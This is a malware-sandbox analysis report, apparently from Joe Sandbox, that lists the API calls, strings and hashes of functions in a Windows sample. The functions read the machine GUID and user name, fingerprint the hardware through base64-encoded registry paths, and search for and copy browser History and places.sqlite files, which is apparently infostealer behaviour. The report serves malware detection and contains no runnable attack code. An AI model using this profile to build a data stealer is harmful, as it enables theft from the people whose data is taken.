RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AllocOpenQueryStringValue
String ID:
API String ID: 4139485348-0
Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5

Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5

Function 00620B70 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,0061FF9B,?,?), ref: 00620B7A
SetErrorMode.KERNEL32(00000000,?,?,0061FF9B,?,?), ref: 00620B7F

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6fe4a5bb6d039ac60b994ea2f5bb51eac6380bcc9b8ab58dd562a939b5b37b69
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 91D0123114512877D7002A94DC09BCD7F1C9F05BA7F008011FB0DD9181C771994046E5

Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Function 00620321 Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0062026B

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
Instruction ID: af14b0bc993fb8b73ba8c9c06f0f1e2b5db12d9d6a1e4dcc62beb331312aa7da
Opcode Fuzzy Hash: dbb718cec77b63f2c87692c5cf3c11fae30828a8f60476d1a53ae7f6434210d1
Instruction Fuzzy Hash: F0212875902629CFEB60CF68DD84B98B7B1BB09304F0485E6E50DA7392D630AE84DF24

Function 004065C4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57

Function 004065C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57

Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Function 0040151C Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89

Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Non-executed Functions

Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

0_@, xrefs: 00414BBB, 00414BD1
.LNK, xrefs: 00414788
._., xrefs: 0041485D
LLA, xrefs: 00414C04
CA, xrefs: 004144DA, 00414580, 00414A89, 00414BEC

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$0_@$LLA$CA
API String ID: 1653790112-882170572
Opcode ID: e51857b0ac6e26b187f5ae22c82cec80f88bd72de0991bbfb205d8afb095c092
Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
Opcode Fuzzy Hash: e51857b0ac6e26b187f5ae22c82cec80f88bd72de0991bbfb205d8afb095c092
Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59

Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Video Info, xrefs: 00416856
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59

Function 00404C15 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404C7B
GetVersion.KERNEL32 ref: 00404C8F
GetVersion.KERNEL32 ref: 00404CA0
GetCurrentThreadId.KERNEL32 ref: 00404CDC

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404CBC

Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Strings

`%`, xrefs: 00404C80

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID: `%`
API String ID: 3734044017-316121997
Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE

Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19

Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18

Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8

Strings

.txt, xrefs: 004131AE
\places.sqlite, xrefs: 00413144
\*.*, xrefs: 0041308F

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\places.sqlite
API String ID: 1974802433-3919338718
Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18

Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F

Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 00411216
.txt, xrefs: 00411355, 00411444

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58

Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

.txt, xrefs: 00411717
\*.*, xrefs: 004115E2

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18

Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

.txt, xrefs: 00411717
\*.*, xrefs: 004115E2

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58

